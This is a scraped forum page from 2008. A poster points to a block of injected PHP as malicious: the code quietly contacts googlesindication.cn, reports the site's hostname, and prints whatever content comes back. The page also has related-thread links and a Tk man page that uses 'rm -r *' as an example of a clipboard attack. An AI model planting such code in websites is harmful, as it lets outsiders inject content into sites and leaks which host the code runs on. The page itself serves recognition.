02-25-2008
The following is ok :
<?php
phpinfo();
?>
While the entire following is malicious:
<?php
error_reporting(0);
$fn = "googlesindication.cn";
$fp = fsockopen($fn, 80, $errno, $errstr, 15);
if (!$fp) {
} else {
$query='site='.$_SERVER['HTTP_HOST'];
$out = "GET /links.php?".$query." HTTP/1.1\r\n";
$out .= "Host: googlesindication.cn\r\n";
$out .= "Connection: Keep-Alive\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$var .= fgets($fp, 128);
}
list($headers, $content) = explode("\r\n\r\n", $var);
print $content;
fclose($fp);
}
?>
Thanks
7 More Discussions You Might Find Interesting
1. Shell Programming and Scripting
Hello
I ask you how to make a
Anti-malicious files and viruses
Or if one of you a small example of the work on the same place and I hope my request
I want a small patch or the process of examination Virus
http://www.google.jo/images/cleardot.gif
---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies
2. Cybersecurity
A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work:
CSI:Internet - Alarm at the pizza service
CSI:Internet - The image of death
CSI:Internet - PDF timebomb
CSI:Internet -... (0 Replies)
Discussion started by: pludi
0 Replies
3. Shell Programming and Scripting
Hi all,
I have a file with extended ASCII codes in the description which needs to be removed.
List of extended ascii codes
"Œ", "œ", "Š", "š", "Ÿ", "ƒ", "-", "-", "‘",
"'", "‚", "“", "”", "„","†", "‡", "•",
"...", "‰", "€", "™"
Sample data:
Test Details-HAVE BEEN PUBLISHED... (1 Reply)
Discussion started by: btt3165
1 Replies
4. UNIX for Dummies Questions & Answers
Hi,
I have a file containing color codes:
Fri May 25 17:13:04 2012: Starting MTA: exim4^ Loading cpufreq kernel modules...^How can I display it colorized on a linux terminal? (4 Replies)
Discussion started by: ripat
4 Replies
5. Shell Programming and Scripting
Hello,
i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin:
Posting links to pastebin scripts are forbidden at this site.
Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies
6. Debian
Relative newbie to Linux so please be kind and assume I've done little in the way of command line but i have been thrusted into this position.
Here goes. There is a perl script on my box that is using me as a mail server. It is contacting other mail servers to the point of slowing down the box.... (20 Replies)
Discussion started by: dadprpus
20 Replies
7. UNIX for Beginners Questions & Answers
Hi All,
We have a HTML source which will be processed using a informatica workflow. In between these two we have a Unix script which transforms the file.
We are getting an error from past week in the informatica saying invalid format, because the file has unused html reference (0-8,14-31 etc)... (2 Replies)
Discussion started by: karthik adiga
2 Replies
LEARN ABOUT OPENSOLARIS
tk_init
Tk_Init(3TK) Tk Library Procedures Tk_Init(3TK)
__________________________________________________________________________________________________________________________________________________
NAME
Tk_Init, Tk_SafeInit - add Tk to an interpreter and make a new Tk application.
SYNOPSIS
#include <tk.h>
int
Tk_Init(interp)
int
Tk_SafeInit(interp)
ARGUMENTS
Tcl_Interp *interp (in) Interpreter in which to load Tk. Tk should not already be loaded in this interpreter.
_________________________________________________________________
DESCRIPTION
Tk_Init is the package initialization procedure for Tk. It is normally invoked by the Tcl_AppInit procedure for an application or by the
load command. Tk_Init adds all of Tk's commands to interp and creates a new Tk application, including its main window. If the initializa-
tion is successful Tk_Init returns TCL_OK; if there is an error it returns TCL_ERROR. Tk_Init also leaves a result or error message in
interp->result.
If there is a variable argv in interp, Tk_Init treats the contents of this variable as a list of options for the new Tk application. The
options may have any of the forms documented for the wish application (in fact, wish uses Tk_Init to process its command-line arguments).
Tk_SafeInit is identical to Tk_Init except that it removes all Tk commands that are considered unsafe. Those commands and the reasons for
their exclusion are:
bell Continuous ringing of the bell is a nuisance.
clipboard
A malicious script could replace the contents of the clipboard with the string "rm -r *" and lead to surprises when the contents of
the clipboard are pasted.
grab Grab can be used to block the user from using any other applications.
menu Menus can be used to cover the entire screen and to steal input from the user.
selection
See clipboard.
send Send can be used to cause unsafe interpreters to execute commands.
tk The tk command recreates the send command, which is unsafe.
tkwait Tkwait can block the containing process forever
toplevel
Toplevels can be used to cover the entire screen and to steal input from the user.
wm If toplevels are ever allowed, wm can be used to remove decorations, move windows around, etc.
KEYWORDS
safe, application, initialization, load, main window
ATTRIBUTES
See attributes(5) for descriptions of the following attributes:
+--------------------+-----------------+
| ATTRIBUTE TYPE | ATTRIBUTE VALUE |
+--------------------+-----------------+
|Availability | SUNWTk |
+--------------------+-----------------+
|Interface Stability | Uncommitted |
+--------------------+-----------------+
NOTES
Source for Tk is available on http://opensolaris.org.
Tk 8.0 Tk_Init(3TK)